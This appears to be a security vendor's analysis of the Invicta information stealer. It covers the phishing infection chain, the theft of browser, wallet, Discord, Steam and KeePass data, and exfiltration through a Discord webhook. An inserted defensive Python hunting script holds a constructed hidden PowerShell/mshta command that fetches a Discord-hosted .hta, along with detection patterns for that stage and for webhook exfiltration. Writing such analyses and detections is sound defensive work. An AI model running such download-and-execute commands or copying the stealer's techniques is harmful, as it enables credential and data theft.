Invicta Stealer Spreading Through Phony GoDaddy Refund Invoices

Threat Actor Releases Free Builder to Boost Popularity and Inflict Damage

It is apparent from past evidence that threat actors (TAs) utilize social media platforms to demonstrate their technical expertise to attract potential allies or customers interested in acquiring or leasing malware families such as Stealers, Ransomware, RATs, and similar tools.

The primary motivation behind such actions is to generate monetary gains or seek collaborations for engaging in highly profitable cyber-attacks. This pattern underscores the role of social media as a tool for connecting with like-minded individuals and facilitating the pursuit of lucrative cybercrime activities.

Cyble Research and Intelligence Labs (CRIL) came across a new stealer named Invicta Stealer. The developer behind this malware is extensively engaged on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.

The figure below shows the Telegram channel created by TAs to promote the stealer.

Figure 1 – Invicta Stealer Telegram Channel

Additionally, the TA has created a YouTube channel where they demonstrate a video tutorial detailing the steps to create the Invicta Stealer executable using a builder tool available in the GitHub repository.

The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord.

The GitHub post by the TA, illustrated in the figure below, highlights their active promotion of the Invicta Stealer and its functionalities.

Figure 2 – GitHub Post of Invicta Stealer

The GitHub post includes a noteworthy detail: the malware developer generously offers a free stealer builder alongside the provided information. When running the builder executable, users are prompted to input a Discord webhook or server URL, which serves as the command and control (C&C) mechanism.

The figure below illustrates the Invicta Stealer builder.

Figure 3 – Invicta Stealer Builder

CRIL has noticed a significant increase in the prevalence of the Invicta Stealer due to its builder availability on the GitHub page, leading to numerous TAs actively employing it to infect unsuspecting users.

The figure below shows the statistics of Invicta Stealer samples identified in the wild.

Figure 4 – Increased Activity of Invicta Stealer

Infection Chain

The infection begins with a spam email with a deceptive HTML page designed to appear as an authentic refund invoice from GoDaddy, aiming to trick the recipients.

The figure below shows the phishing HTML page.

Figure 5 – Phishing HTML Page

Upon opening the phishing HTML page, users are instantly redirected to a Discord URL, initiating the download of a file named “”. The figure below illustrates the HTML page’s redirection process to the Discord URL to download “”.

Figure 6 – Browser Redirecting to Download Compressed File

Inside the “” archive file, there is a shortcut file named “INVOICE_MT103.lnk”. When the user opens this .LNK file, it triggers a PowerShell command that runs a .HTA file hosted on the TA’s Discord server. The figures below depict the .LNK file and the PowerShell command.

Figure 7 – Details of the Malicious Link File

This HTA file contains VBScript code that, in turn, executes a PowerShell script. The PowerShell script is responsible for downloading an extremely malicious Invicta Stealer disguised as “Invoice_MT103_Payment.exe”.

The figure below shows the malicious PowerShell Command.

Figure 8 – Malicious PowerShell Command

The figure below depicts the entire infection chain of the Invicta stealer, illustrating the step-by-step progression from the initial infection to the delivery of the final payload.

Figure 9 – Invicta Stealer Infection Chain
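The delivery chain above (a PowerShell command from the .LNK that runs a Discord-hosted .HTA, a second PowerShell stage that drops Invoice_MT103_Payment.exe, and a Discord webhook used as C&C) can be hunted for in endpoint telemetry. The following is an added example, not code from the Cyble report or from the stealer: it runs three rules over constructed Sysmon-style events (all pids, paths and URLs are made up) and assumes the .HTA is launched through mshta.exe, which the report does not state explicitly.

```python
import re

# Constructed Sysmon-style telemetry: "proc" rows are process-create events,
# "net" rows are simplified network-connect events. mshta.exe is an assumption.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"type": "proc", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"type": "proc", "pid": 150, "ppid": 100, "image": PS, "cmd": "powershell.exe Get-Date"},  # benign
    {"type": "proc", "pid": 200, "ppid": 100, "image": PS,
     "cmd": "powershell.exe -w hidden mshta https://cdn.discordapp.com/attachments/111/222/invoice.hta"},
    {"type": "proc", "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://cdn.discordapp.com/attachments/111/222/invoice.hta"},
    {"type": "proc", "pid": 400, "ppid": 300, "image": PS,
     "cmd": "powershell.exe <constructed: downloads and starts Invoice_MT103_Payment.exe>"},
    {"type": "proc", "pid": 500, "ppid": 400,
     "image": r"C:\Users\victim\AppData\Local\Temp\Invoice_MT103_Payment.exe", "cmd": "Invoice_MT103_Payment.exe"},
    {"type": "proc", "pid": 600, "ppid": 100, "image": r"C:\Users\victim\AppData\Local\Discord\Discord.exe", "cmd": "Discord.exe"},
    {"type": "net", "pid": 600, "host": "discord.com", "path": "/api/v9/gateway"},  # benign client traffic
    {"type": "net", "pid": 500, "host": "discord.com", "path": "/api/webhooks/111/EXAMPLE_TOKEN"},
]

DISCORD_HTA = re.compile(r"discord(app)?\.com/\S*\.hta\b", re.I)  # .hta served from Discord
WEBHOOK_PATH = re.compile(r"^/api/webhooks/", re.I)                # webhook endpoint used as C&C

def ancestors(procs, pid):
    # Yield the parent chain of pid, nearest parent first; cycle-safe on bad data.
    seen, parent = set(), procs[pid]["ppid"] if pid in procs else None
    while parent in procs and parent not in seen:
        seen.add(parent)
        yield procs[parent]
        parent = procs[parent]["ppid"]

def hunt(events):
    # Return (pid, reason) pairs for events matching the Invicta delivery chain.
    procs = {e["pid"]: e for e in events if e["type"] == "proc"}
    alerts = []
    for e in events:
        if e["type"] == "proc":
            img = e["image"].lower()
            if img.endswith("powershell.exe") and DISCORD_HTA.search(e["cmd"]):
                alerts.append((e["pid"], "PowerShell launching a Discord-hosted .hta (LNK stage)"))
            elif "\\temp\\" in img and img.endswith(".exe") and any(
                    DISCORD_HTA.search(a["cmd"]) for a in ancestors(procs, e["pid"])):
                alerts.append((e["pid"], "executable under Temp descended from the .hta stage"))
        elif e["type"] == "net":
            proc = procs.get(e["pid"])
            from_discord_client = bool(proc) and proc["image"].lower().endswith("\\discord.exe")
            if e["host"].lower() == "discord.com" and WEBHOOK_PATH.match(e["path"]) and not from_discord_client:
                alerts.append((e["pid"], "Discord webhook traffic from a non-Discord process (C&C/exfil)"))
    return alerts
```

Running `hunt(EVENTS)` flags the .hta-fetching PowerShell, the dropped executable and the webhook connection while leaving the benign PowerShell and the real Discord client untouched.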

Technical Analysis

For our analysis of Invicta stealer capabilities, we obtained a 64-bit GUI binary of the malicious Invicta Stealer from the wild. Its SHA256 hash is 067ef14c3736f699c9f6fe24d8ecba5c9d2fc52d8bfa0166ba3695f60a0baa45.

The figure below displays the details of the Invicta Stealer that CRIL analyzed.

Figure 10 – Invicta Stealer File Details

Anti-VM techniques

To obscure the reversing process, the stealer employs several techniques. The developers utilize encrypted strings to conceal important information, and crucial operations are executed using SYSCALLS, making it harder to analyze the code. Additionally, the stealer leverages multithreading to carry out multiple malicious activities simultaneously.

The figure below illustrates the assembly code responsible for the execution of SYSCALLS.

Figure 11 – Invicta Stealer Implementing SYSCALLS

Targeting System Information

Upon execution, the stealer collects an extensive array of system information. This includes details such as the computer name, system username, system time zone, system language, operating system version, and names of running processes. Additionally, the stealer employs techniques to extract system hardware information, such as the main memory size, number of CPU cores, screen resolution, hardware ID, IP address, and Geo IP details. Once the system information is extracted, the stealer consolidates the collected data into a single text file named “sys_info.txt”. This file is then stored in memory and will be exfiltrated in the later stage of execution.

Figure 12 – sys_info.txt File Containing the System Details

Targeting Discord

Upon retrieving essential system information, the stealer proceeds to verify the presence of the Discord application on the targeted system. To accomplish this, the stealer enumerates three specific paths within the system. This enumeration aims to confirm the installation of Discord and, if it is indeed present, proceed with the extraction of its data. The paths enumerated by the Invicta Stealer are:

  • C:\Users\<user>\AppData\Roaming\discord\Local Storage\leveldb
  • C:\Users\<user>\AppData\Roaming\discordptb\Local Storage\leveldb
  • C:\Users\<user>\AppData\Roaming\discordcanary\Local Storage\leveldb

The figure below shows the Invicta Stealer targeting Discord.

Figure 13 – Invicta Stealer Targeting Discord

Targeting Wallets

Once Discord is targeted, the stealer enumerates the installed cryptocurrency wallets within the system. This enumeration process involves identifying and listing the various wallets present.

The figure below showcases the specific code segment where the stealer performs the wallet enumeration.

Figure 14 – Invicta Stealer Targeting the Crypto Wallets

The table below lists all the wallets targeted by the Invicta Stealer:

  • CloakCoin
  • ElectrumG
  • MultiBitHD
  • Exodus Eden
  • Electrum-LTC
  • Electrum-Smart
  • com.liberty.jaxx
  • Daedalus Mainnet
  • ark-desktop-wallet
  • Nano Wallet Desktop

Targeting Browsers

Following the targeting of cryptocurrency wallets, the stealer focuses on the user’s browser to steal sensitive data. This data includes the leveldb folder, autofill data, cookies, credit card details, downloads, browsing history, keywords, and login data.

The figure below illustrates the code snippet where the stealer conducts the enumeration of browser data.

Figure 15 – Stealer Enumerating the Browsers

The stealer targets the following browsers to steal information:

  • QIP Surf
  • BraveSoftware
  • Blisk
  • Torch
  • 7Star
  • Amigo
  • Opera Stable
  • Yandex
  • Comodo Dragon
  • Chedot
  • Google Chrome
  • CocCoc Browser
  • Slimjet
  • ChromePlus
  • Elements Browser
  • Sleipnir
  • Chromium
  • Uran
  • 360Browser
  • Opera Neon
  • CentBrowser
  • Epic Privacy Browser
  • Microsoft Edge

After confirming the presence of the targeted browser within the system, the stealer initiates the process of extracting data from it. The extracted data is then stored in memory, preparing it for the subsequent exfiltration stage. The figure below illustrates the code snippet the stealer employs to steal login data from the Edge browser specifically.

Figure 16 – Invicta Stealer Targeting Login Data

The figure below shows stolen data from the browsers installed on the victim’s machine.

Figure 17 – Invicta Stealing the Browser Data from System

Targeting Steam

Simultaneously with the theft of browser data, the stealer also directs its attention toward the Steam gaming application. Its objective is to steal crucial information such as active gaming sessions, usernames, and a comprehensive list of games installed by the user on the system.

The figure below displays the specific code segment in which the stealer targets the Steam application.

Figure 18 – Invicta Stealer Targeting Steam Gaming Application

Targeting Password Manager

Following the extraction of Steam data, the stealer then shifts its focus towards targeting the KeyPass password manager. KeyPass is a password management application that centralizes and manages passwords for various websites and applications in one location.

The figure below showcases the code segment targeting the KeyPass password manager.

Figure 19 – Invicta Stealer Targets KeyPass Password Manager

Installed Applications and Users

Next, the Invicta Stealer initiates the process of extracting user account details, including the applications associated with those accounts. It gathers the names and versions of these applications and saves the collected information in memory, creating a text file named “installed.txt”, as depicted below.

Figure 20 – Stealer Extracting the Installed Application Details

Stealing Important Files

Following the enumeration of installed applications, the stealer advances towards stealing files from the Desktop and Documents folders. Specifically, the figure below depicts the routine employed by the stealer to target and extract text files from the Desktop folder.

Figure 21 – Invicta Stealer Targeting the Files in the System

As the stealer actively collects the targeted data, it temporarily stores the acquired files in the system’s memory. Once the necessary enumerations are completed, the stealer progresses to create a compressed zip file that encapsulates all the stolen files residing in memory.

This zip file is generated within the system’s temporary folder and is assigned a randomized name that includes the hardware ID of the victim’s system, which lets the TA identify the source machine.

The figure below presents an illustration of the zip file.

Figure 22 – Invicta Stealer Creating Zip File Containing Stolen Data

After successfully completing the data theft process, the stealer proceeds to carry out the next step by sending the stolen data to the designated C&C server or Discord webhook.
We have observed an ongoing trend where malware developers create and offer a wide range of stealers to potential buyers and affiliates. Among these, the Invicta Stealer stands out as an extremely potent threat due to its ability to target multiple categories of highly sensitive information across several applications and browsers.

This stolen data can be leveraged by attackers for financial gain, as well as for launching attacks on other individuals or organizations using the compromised information. It is crucial to acknowledge the severity of this threat and take appropriate measures to protect against such malicious activities.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices as mentioned below:

  • Avoid downloading pirated software from warez/torrent websites. The “Hack Tool” present on sites such as YouTube, torrent sites, etc., mainly contains such malware.
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity. 
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.

MITRE ATT&CK® Techniques

Tactic              | Technique ID | Technique Name
Execution           | T1204        | User Execution
Defense Evasion     | T1027        | Obfuscated Files or Information
Credential Access   | T1528        | Steal Application Access Token
Credential Access   |              | Credentials from Password Stores
Discovery           | T1010        | Application Window Discovery
Discovery           |              | File and Directory Discovery
Collection          | T1005        | Data from Local System
Command and Control | T1071        | Application Layer Protocol

Indicators of Compromise (IOCs)

Indicators Indicator Type Description 
Malicious Phishing html
Shortcut Link File
Malicious HTA File
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
